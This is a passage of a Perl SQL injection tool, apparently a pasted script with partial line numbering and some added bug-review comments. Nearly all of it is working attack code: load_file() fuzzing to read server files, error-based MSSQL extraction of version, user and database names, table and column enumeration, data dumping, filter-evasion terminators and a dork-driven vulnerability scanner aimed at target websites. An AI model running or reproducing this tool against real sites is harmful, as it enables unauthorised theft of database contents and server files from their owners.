close(vuln_file);
print YELLOW,"\n[+] Result Saved to $vulnfile\n",RESET;
}
}
else
{
print BOLD,YELLOW,"[+] Please Enter the target this way :\n http://target.net/page.php?id=0+union+select+1,2,nullarea,3\n",RESET;
exit () ;
}
}
  709.  
# --mysqlfile: for each path in the --listfile wordlist, inject
# concat(0x7075707079, load_file('<path>')) through the NullArea
# placeholder and report the path if the page contains 'az88pix00q'.
#
# That token is not the injected marker (0x7075707079 decodes to
# "puppy"), so a path is only reported when the file's own contents
# happen to contain 'az88pix00q'.  Wordlist lines keep their trailing
# newline, which ends up inside the load_file('...') quotes.  Hits are
# collected in @cols_possible even though they are file paths.
# Same two-arg open on the raw --listfile value and never-closed bareword
# handle as mysqlfuzztable(); same unchecked --output open.
sub mysqlfile
{
my $site = $_[0];
my $ev = $_[1];
my $filelst = $_[2];
print "[+] File List $filelst\n";
my @cols_possible=();
if ($ev eq '/*')
{$add = "/**/" ; $com = "/*";}
elsif ($ev eq '%20')
{$add = "%20" ; $com = "%00" ;}
else
{$add = '+' ; $com ='--';}
# two-arg open on an operator-supplied path (see header)
open (word_list_file,"$filelst") or die RED,"[!] Couldnt Open WordList File $!\n",RESET;
@word_list_search = <word_list_file> ;
print GREEN, "\n[+] File Fuzz, Started Please Wait!\n\n",RESET;
if ($site =~ /(.*)NullArea(.*)/i)
{
print GREEN, "[+] Fuzz Result : \n\n",RESET;
$i=0;
foreach (@word_list_search)
{
$newstring = $1."concat(0x7075707079,load_file('$word_list_search[$i]'))".$2.$com;
my $ua = LWP::UserAgent->new();
$ua->proxy("http", "http://$proxy/") if defined($proxy);
my $request = $ua->get($newstring);
my $content = $request->content;
print GREEN, "[!] Trying To Fuzz Load_File with $word_list_search[$i]",RESET;
# not the marker that was injected (see header)
if ($content =~ m/az88pix00q/i)
{
print GREEN, "\n[!] Found File ! $word_list_search[$i] \n",RESET;
push(@cols_possible,"$word_list_search[$i]\n");
}
$i++;
}
if (defined($vulnfile))
{
open(vuln_file,">>$vulnfile") ;
print vuln_file "[!] Target : $site\n";
print vuln_file "[!] evasion : $ev\n";
print vuln_file "[!] Wordlist : $filelst\n";
print vuln_file "[!] Files Found :: ---- \n\n\n";
$i=0;
foreach(@cols_possible)
{
print vuln_file $cols_possible[$i]."\n";
$i++;
}
close(vuln_file);
print YELLOW,"\n[+] Result Saved to $vulnfile\n",RESET;
}
}
else
{
print BOLD, YELLOW,"[+] Please Enter the target this way :\n http://target.net/page.php?id=0+union+select+1,2,nullarea,3\n",RESET;
exit () ;
}
}
  768.  
# --mssqldetails: error-based extraction.  Each payload wraps a scalar
# subquery in convert(int, ...) so that the server's conversion error
# message echoes the value; the value is pulled back out of the
# response with /value\s'(.*?)'\sto/.
#
# Differences from the MySQL subs, as found:
#  * $proxy is ignored -- no ->proxy() call on any of the four agents.
#  * $com is unused; every payload hard-codes a '--' terminator, so the
#    --evasion terminator has no effect here ($add does apply).
#  * Only the version regex is non-greedy; the system_user, db_name and
#    servername regexes use greedy (.*) and can over-capture when the
#    response holds more than one quoted value.
#  * $response is the full ->as_string (headers + body).
#  * The not-vulnerable branch runs system("cls") (cmd.exe), while the
#    rest of the file uses 'clear'.
#  * $version, $system_user, $db_name and $servername are package
#    globals; the last three are overwritten with the extracted values.
# Each agent has a 10 s timeout.  Every path exits.
sub mssqldetails
{
my $site = $_[0];
my $ev = $_[1];
if ($ev eq '/*')
{$add = "/**/" ; $com = "/*";}
elsif ($ev eq '%20')
{$add = "%20" ; $com = "%00" ;}
else
{$add = '+' ; $com ='--';}
print GREEN,"\n[+] Getting Infos, Started Please Wait!\n\n",RESET;
$version = "convert(int,(select".$add."\@\@version));--" ;
$system_user = 'convert(int,(select'.$add.'system_user));--';
$db_name = 'convert(int,(select'.$add.'db_name()));--';
$servername = 'convert(int,(select'.$add.'@@servername));--' ;
my $injection = $site.$version ;
my $request = HTTP::Request->new(GET=>$injection);
my $useragent = LWP::UserAgent->new();
$useragent->timeout(10);
my $response = $useragent->request($request)->as_string ;
if ($response =~ /.*?value\s'/)
{
print BOLD,GREEN,"[+] This Website Is SQL Vulnerable ..\n",RESET;
print GREEN,"[+] Working On It ..\n",RESET;
$ver = $1 if ($response =~ /.*?value\s'(.*?)'\sto.*/sm) ;
print GREEN,"\n[!] MsSQL Version Is :",RESET;
print "\n\n => $ver" ;
my $injection = $site.$system_user ;
my $request = HTTP::Request->new(GET=>$injection);
my $useragent = LWP::UserAgent->new();
$useragent->timeout(10);
my $response = $useragent->request($request)->as_string ;
# greedy capture from here on (see header)
$system_user = $1 if ($response =~ /.*value\s'(.*)'\sto.*/);
print GREEN,"\n[!] MsSQL System_User Is :",RESET;
print " $system_user " ;
my $injection = $site.$db_name ;
my $request = HTTP::Request->new(GET=>$injection);
my $useragent = LWP::UserAgent->new();
$useragent->timeout(10);
my $response = $useragent->request($request)->as_string ;
$db_name = $1 if ($response =~ /.*value\s'(.*)'\sto.*/);
print GREEN,"\n[!] MsSQL Database Name Is :",RESET;
print " $db_name " ;
my $injection = $site.$servername ;
my $request = HTTP::Request->new(GET=>$injection);
my $useragent = LWP::UserAgent->new();
$useragent->timeout(10);
my $response = $useragent->request($request)->as_string ;
$servername = $1 if ($response =~ /.*value\s'(.*)'\sto.*/);
print GREEN,"\n[!] MsSQL Server Name Is :",RESET;
print " $servername " ;
exit ();
}
else
{
system ("cls");
print BOLD,YELLOW,"\n[!] This Website Is Not SQL Vulnerable !",RESET;
exit();
}
}
  829.  
# --mssqltable: enumerate table names by error-based extraction.  Each
# request asks for 'TOP 1 table_name' excluding everything already seen
# (NOT IN (...)), growing the exclusion list by one name per hit, for up
# to 1500 requests.
#
# Bugs, left as found:
#  * The proxy is applied to $ua, a package global this sub never sets,
#    while the request goes through the lexical $useragent.  So --proxy
#    is silently ignored here, and if $ua is still undef the method call
#    dies with "Can't call method "proxy" on an undefined value".
#  * for ($i;$i<1500;$i++) does not initialise $i; it continues from
#    whatever the shared package global currently holds.
#  * $com is unused; the '--' terminator is hard-coded.
#  * $data starts with a dummy quoted name so the NOT IN list is never
#    empty; $table, $data, $start, $end, $total and @exttbles are package
#    globals and are not reset between calls.
# --output uses an unchecked two-arg open on a bareword handle; the last
# print omits the comma after YELLOW (should still print, reads oddly).
sub mssqltable
{
my $site = $_[0];
my $ev = $_[1];
if ($ev eq '/*')
{$add = "/**/" ; $com = "/*";}
elsif ($ev eq '%20')
{$add = "%20" ; $com = "%00" ;}
else
{$add = '+' ; $com ='--';}
print GREEN,"\n[+] Table Extracting, Started Please Wait!\n\n",RESET;
$table = "convert(int,(select".$add."top".$add."1".$add."table_name".$add."from".$add."information_schema.tables));--";
$data = "'Ws65qd798sqd9878'";
print GREEN,"[!] Tables : \n\n",RESET;
# $i is not initialised here (see header)
for ($i;$i<1500;$i++)
{
my $injection = $site.$table ;
my $useragent = LWP::UserAgent->new();
# wrong variable: $ua is not this sub's agent (see header)
$ua->proxy("http", "http://$proxy/") if defined($proxy);
my $request = $useragent->get($injection);
my $response = $request->content;
if ($response =~ /.*?value\s'(.*?)'\sto.*/sm)
{
print "[+] ".$1."\n";
push (@exttbles,$1);
$start = "(";
$data .= ",'$1'";
$end = ")";
$total = $start.$data.$end;
$table = "convert(int,(select".$add."top".$add."1".$add."table_name".$add."from".$add."information_schema.tables".$add."where".$add."table_name".$add."not".$add."in".$add."$total));--";
}
}
if (defined($vulnfile))
{
open(vuln_file,">>$vulnfile") ;
print vuln_file "[!] Target : $site\n";
print vuln_file "[!] evasion : $ev\n";
print vuln_file "[!] Data :: ---- \n\n\n";
$i=0;
foreach(@exttbles)
{
print vuln_file $exttbles[$i]."\n";
$i++;
}
close(vuln_file);
print YELLOW"\n[+] Result Saved to $vulnfile\n",RESET;
}
}
  878.  
  879. sub mssqlcolumn
  880. {
  881. my $site = $_[0];
  882. my $ev = $_[1];
  883. my $tblextrct = $_[2];
  884. print GREEN,"[+] Table To Extract From $tblextrct\n",RESET;
  885. if ($ev eq '/*')
  886. {$add = "/**/" ; $com = "/*";}
  887. elsif ($ev eq '%20')
  888. {$add = "%20" ; $com = "%00" ;}
  889. else
  890. {$add = '+' ; $com ='--';}
  891. print GREEN,"\n[+] Table Extracting, Started Please Wait!\n\n",RESET;
  892. $data = "'Ws65qd798sqd9878'";
  893. $table = "convert(int,(select".$add."top".$add."1".$add."column_name".$add."from".$add."information_schema.columns".$add."where".$add."table_name"."="."'$tblextrct'".$add."And".$add."column_name".$add."not".$add."in".$add."($data)"."));--";
  894. print GREEN,"[!] Columns : \n\n",RESET;
  895. for ($i;$i<1500;$i++)
  896. {
  897. my $injection = $site.$table ;
  898. my $useragent = LWP::UserAgent->new();
  899. $ua->proxy("http", "http://$proxy/") if defined($proxy);
  900. my $request = $useragent->get($injection);
  901. my $response = $request->content;
  902. if ($response =~ /.*?value\s'(.*?)'\sto.*/sm)
  903. {
  904. print "[+] ".$1."\n";
  905. push (@extcols,$1);
  906. $start = "(";
  907. $data .= ",'$1'";
  908. $end = ")";
  909. $total = $start.$data.$end;
  910. $table = "convert(int,(select".$add."top".$add."1".$add."column_name".$add."from".$add."information_schema.columns".$add."where".$add."table_name"."="."'$tblextrct'".$add."And".$add."column_name".$add."not".$add."in".$add."$total"."));--";
  911. }
  912. }
  913. if (defined($vulnfile))
  914. {
  915. open(vuln_file,">>$vulnfile") ;
  916. print vuln_file "[!] Target : $site\n";
  917. print vuln_file "[!] evasion : $ev\n";
  918. print vuln_file "[!] Data :: ---- \n\n\n";
  919. $i=0;
  920. foreach(@extcols)
  921. {
  922. print vuln_file $extcols[$i]."\n";
  923. $i++;
  924. }
  925. close(vuln_file);
  926. print YELLOW,"\n[+] Result Saved to $vulnfile\n",RESET;
  927. }
  928. }
  929.  
  930. sub mssqldump
  931. {
  932. my $site = $_[0];
  933. my $ev = $_[1];
  934. my $tblextrct = $_[2];
  935. my $colmextrct = $_[3];
  936. print GREEN,"[+] Table : $tblextrct\n";
  937. print "[+] Column : $colmextrct\n",RESET;
  938. if ($ev eq '/*')
  939. {$add = "/**/" ; $com = "/*";}
  940. elsif ($ev eq '%20')
  941. {$add = "%20" ; $com = "%00" ;}
  942. else
  943. {$add = '+' ; $com ='--';}
  944. print GREEN,"\n[+] Table Extracting, Started Please Wait!\n\n",RESET;
  945. $data = "'Ws65qd798sqd9878'";
  946. $table = "convert(int,(select".$add."top".$add."1".$add."$colmextrct".$add."from".$add."$tblextrct".$add."where".$add."$colmextrct".$add."not".$add."in".$add."($data)"."));--";
  947. print GREEN,"[!] Columns : \n\n",RESET;
  948. for ($i;$i<1500;$i++)
  949. {
  950. my $injection = $site.$table ;
  951. my $useragent = LWP::UserAgent->new();
  952. $ua->proxy("http", "http://$proxy/") if defined($proxy);
  953. my $request = $useragent->get($injection);
  954. my $response = $request->content;
  955. if ($response =~ /.*?value\s'(.*?)'\sto.*/sm)
  956. {
  957. print "[+] ".$1."\n";
  958. push (@dumpdata,$1);
  959. $start = "(";
  960. $data .= ",'$1'";
  961. $end = ")";
  962. $total = $start.$data.$end;
  963. $table = "convert(int,(select".$add."top".$add."1".$add."$colmextrct".$add."from".$add."$tblextrct".$add."where".$add."$colmextrct".$add."not".$add."in".$add."$total"."));--";
  964. }
  965. }
  966. if (defined($vulnfile))
  967. {
  968. open(vuln_file,">>$vulnfile") ;
  969. print vuln_file "[!] Target : $site\n";
  970. print vuln_file "[!] evasion : $ev\n";
  971. print vuln_file "[!] Data :: ---- \n\n\n";
  972. $i=0;
  973. foreach(@dumpdata)
  974. {
  975. print vuln_file $dumpdata[$i]."\n";
  976. $i++;
  977. }
  978. close(vuln_file);
  979. print YELLOW,"\n[+] Result Saved to $vulnfile\n",RESET;
  980. }
  981. }
  982.  
  983. variables();
  984. main();
  985.  
  986. if (defined($search_dork))
  987. {
  988. print BOLD,GREEN,"[+] Vulnerability Scan\n" ;
  989. print "[+] Dork : $search_dork\n\n\n",RESET;
  990. vulnscanner();
  991. if (defined($vulnfile))
  992. {
  993. open(vuln_file,">>$vulnfile") ;
  994. print vuln_file @mysqlvuln;
  995. print vuln_file @mssqlvuln;
  996. print vuln_file @accessvuln;
  997. close(vuln_file);
  998. print YELLOW,"[+] Result Saved to $vulnfile\n",RESET;
  999. exit();
  1000. }
  1001. }
  1002.  
  1003. if (defined($mysql_count_target))
  1004. {
  1005. print GREEN,"[+] MySQL Column Counter\n\n" ;
  1006. print "[+] Target : $mysql_count_target\n",RESET ;
  1007. if ($evasion eq '/*')
  1008. {
  1009. print GREEN,"[+] Evasion : /**/\n",RESET;
  1010. }
  1011. elsif ($evasion eq '%20')
  1012. {
  1013. print GREEN,"[+] Evasion : %20\n" ,RESET;
  1014. }
  1015. else
  1016. {
  1017. print GREEN,"[+] Evasion : --\n" ,RESET;
  1018. $evasion = "--"
  1019. }
  1020. mysqlcount($mysql_count_target,$evasion);
  1021. }
  1022.  
  1023. if (defined($mysql_details_target))
  1024. {
  1025. print GREEN,"[+] MySQL database details\n\n" ;
  1026. print "[+] Target : $mysql_details_target\n",RESET;
  1027. if ($evasion eq '/*')
  1028. {
  1029. print GREEN,"[+] Evasion : /**/\n",RESET;
  1030. }
  1031. elsif ($evasion eq '%20')
  1032. {
  1033. print GREEN,"[+] Evasion : %20\n" ,RESET;
  1034. }
  1035. else
  1036. {
  1037. print GREEN,"[+] Evasion : --\n" ,RESET;
  1038. $evasion = "--"
  1039. }
  1040. mysqldetails($mysql_details_target,$evasion);
  1041. }
  1042.  
  1043. if (defined($mysql_schema_target))
  1044. {
  1045. print GREEN,"[+] MySQL Schema Extractor details\n\n" ;
  1046. print "[+] Target : $mysql_schema_target\n" ,RESET;
  1047. if ($evasion eq '/*')
  1048. {
  1049. print GREEN,"[+] Evasion : /**/\n",RESET;
  1050. }
  1051. elsif ($evasion eq '%20')
  1052. {
  1053. print GREEN,"[+] Evasion : %20\n",RESET;
  1054. }
  1055. else
  1056. {
  1057. print GREEN,"[+] Evasion : --\n" ,RESET;
  1058. $evasion = "--"
  1059. }
  1060. mysqlschema($mysql_schema_target,$evasion);
  1061. }
  1062.  
  1063. if (defined($mysql_dump_target))
  1064. {
  1065. if (!defined($sql_dump_column))
  1066. {
  1067. print YELLOW,"[!] Please Defind At Least A Column\n",RESET;
  1068. exit();
  1069. }
  1070. elsif (!defined($sql_dump_table))
  1071. {
  1072. print YELLOW,"[!] Please Defind Table Name\n",RESET;
  1073. exit();
  1074. }
  1075. else
  1076. {
  1077. print GREEN,"[+] MySQL Data Dumper details\n\n" ;
  1078. print "[+] Target : $mysql_dump_target\n" ,RESET;
  1079. if ($evasion eq '/*')
  1080. {
  1081. print GREEN,"[+] Evasion : /**/\n" ,RESET;
  1082. }
  1083. elsif ($evasion eq '%20')
  1084. {
  1085. print GREEN,"[+] Evasion : %20\n" ,RESET;
  1086. }
  1087. else
  1088. {
  1089. print GREEN,"[+] Evasion : --\n" ,RESET;
  1090. $evasion = "--"
  1091. }
  1092. mysqldump($mysql_dump_target,$sql_dump_column,$sql_dump_table,$evasion);
  1093. }
  1094. }
  1095.  
  1096. if (defined($mysql_fuzz_table))
  1097. {
  1098. if(!defined($word_list))
  1099. {
  1100. print YELLOW,"[!] Please Define A list of tables to load\n";
  1101. exit();
  1102. }
  1103. else
  1104. {
  1105. print GREEN,"[+] MySQL Tables Fuzzer\n\n" ;
  1106. print "[+] Target : $mysql_fuzz_table\n" ,RESET;
  1107. if ($evasion eq '/*')
  1108. {
  1109. print GREEN,"[+] Evasion : /**/\n",RESET;
  1110. }
  1111. elsif ($evasion eq '%20')
  1112. {
  1113. print GREEN,"[+] Evasion : %20\n",RESET;
  1114. }
  1115. else
  1116. {
  1117. print GREEN,"[+] Evasion : --\n",RESET;
  1118. $evasion = "--"
  1119. }
  1120. mysqlfuzztable($mysql_fuzz_table,$evasion,$word_list);
  1121. }
  1122. }
  1123.  
  1124. if (defined($mysql_fuzz_column))
  1125. {
  1126. if(!defined($word_list))
  1127. {
  1128. print YELLOW,"[!] Please Define A list of tables to load\n",RESET;
  1129. exit();
  1130. }
  1131. elsif(!defined($sql_dump_table))
  1132. {
  1133. print YELLOW,"[!] Please Define A Table To Fuzz it's Columns\n",RESET;
  1134. exit();
  1135. }
  1136. else
  1137. {
  1138. print GREEN,"[+] MySQL Columns Fuzzer\n\n" ;
  1139. print "[+] Target : $mysql_fuzz_column\n",RESET ;
  1140. if ($evasion eq '/*')
  1141. {
  1142. print GREEN,"[+] Evasion : /**/\n" ,RESET;
  1143. }
  1144. elsif ($evasion eq '%20')
  1145. {
  1146. print GREEN,"[+] Evasion : %20\n",RESET;
  1147. }
  1148. else
  1149. {
  1150. print GREEN,"[+] Evasion : --\n",RESET;
  1151. $evasion = "--"
  1152. }
  1153. mysqlfuzzcolumn($mysql_fuzz_column,$evasion,$word_list,$sql_dump_table);
  1154. }
  1155. }
  1156.  
  1157. if (defined($mysql_load_file))
  1158. {
  1159. if(!defined($word_list))
  1160. {
  1161. print YELLOW,"[!] Please Define A list of tables to load\n",RESET;
  1162. exit();
  1163. }
  1164. else
  1165. {
  1166. print GREEN,"[+] MySQL Load_File Fuzzer\n\n" ;
  1167. print "[+] Target : $mysql_load_file\n",RESET;
  1168. if ($evasion eq '/*')
  1169. {
  1170. print GREEN,"[+] Evasion : /**/\n" ,RESET;
  1171. }
  1172. elsif ($evasion eq '%20')
  1173. {
  1174. print GREEN,"[+] Evasion : %20\n" ,RESET;
  1175. }
  1176. else
  1177. {
  1178. print GREEN,"[+] Evasion : --\n" ,RESET;
  1179. $evasion = "--"
  1180. }
  1181. mysqlfile($mysql_load_file,$evasion,$word_list);
  1182. }
  1183. }
  1184.  
  1185. if (defined($mssql_details_target))
  1186. {
  1187. print GREEN,"[+] MsSQL DB Details\n\n" ;
  1188. print "[+] Target : $mssql_details_target\n" ,RESET;
  1189. if ($evasion eq '/*')
  1190. {
  1191. print GREEN,"[+] Evasion : /**/\n" ,RESET;
  1192. }
  1193. elsif ($evasion eq '%20')
  1194. {
  1195. print GREEN,"[+] Evasion : %20\n" ,RESET;
  1196. }
  1197. else
  1198. {
  1199. print GREEN,"[+] Evasion : --\n",RESET;
  1200. $evasion = "--"
  1201. }
  1202. mssqldetails($mssql_details_target,$evasion);
  1203. }
  1204.  
  1205. if (defined($mssql_table_target))
  1206. {
  1207. print GREEN,"[+] MsSQL Tables Extractor\n\n" ;
  1208. print "[+] Target : $mssql_table_target\n" ,RESET;
  1209. if ($evasion eq '/*')
  1210. {
  1211. print GREEN,"[+] Evasion : /**/\n",RESET;
  1212. }
  1213. elsif ($evasion eq '%20')
  1214. {
  1215. print GREEN,"[+] Evasion : %20\n" ,RESET;
  1216. }
  1217. else
  1218. {
  1219. print GREEN,"[+] Evasion : --\n" ,RESET;
  1220. $evasion = "--"
  1221. }
  1222. mssqltable($mssql_table_target,$evasion);
  1223. }
  1224.  
  1225. if (defined($mssql_column_target))
  1226. {
  1227. if(!defined($sql_dump_table))
  1228. {
  1229. print YELLOW,"[!] Please Defind At Least A Table do Extract from\n",RESET;
  1230. exit();
  1231. }
  1232. else
  1233. {
  1234. print GREEN,"[+] MsSQL Columns Extractor\n\n" ;
  1235. print "[+] Target : $mssql_column_target\n" ,RESET;
  1236. if ($evasion eq '/*')
  1237. {
  1238. print GREEN,"[+] Evasion : /**/\n",RESET;
  1239. }
  1240. elsif ($evasion eq '%20')
  1241. {
  1242. print GREEN,"[+] Evasion : %20\n",RESET;
  1243. }
  1244. else
  1245. {
  1246. print GREEN,"[+] Evasion : --\n",RESET;
  1247. $evasion = "--"
  1248. }
  1249. mssqlcolumn($mssql_column_target,$evasion,$sql_dump_table);
  1250. }
  1251. }
  1252.  
  1253. if (defined($mssql_dump_target))
  1254. {
  1255. if(!defined($sql_dump_table))
  1256. {
  1257. print YELLOW,"[!] Please Defind At Least A Table\n",RESET;
  1258. exit();
  1259. }
  1260. elsif(!defined($sql_dump_column))
  1261. {
  1262. print YELLOW,"[!] Please Defind At Least A Column\n",RESET;
  1263. exit();
  1264. }
  1265. else
  1266. {
  1267. print GREEN,"[+] MsSQL Data Dumper\n\n" ;
  1268. print "[+] Target : $mssql_dump_target\n",RESET;
  1269. if ($evasion eq '/*')
  1270. {
  1271. print GREEN,"[+] Evasion : /**/\n",RESET;
  1272. }
  1273. elsif ($evasion eq '%20')
  1274. {
  1275. print GREEN,"[+] Evasion : %20\n",RESET;
  1276. }
  1277. else
  1278. {
  1279. print GREEN,"[+] Evasion : --\n",RESET;
  1280. $evasion = "--"
  1281. }
  1282. mssqldump($mssql_dump_target,$evasion,$sql_dump_table,$sql_dump_column);
  1283. }
  1284. }
  1285. #-----------------------------------------------------------#
  1286. # End #
  1287. #-----------------------------------------------------------#
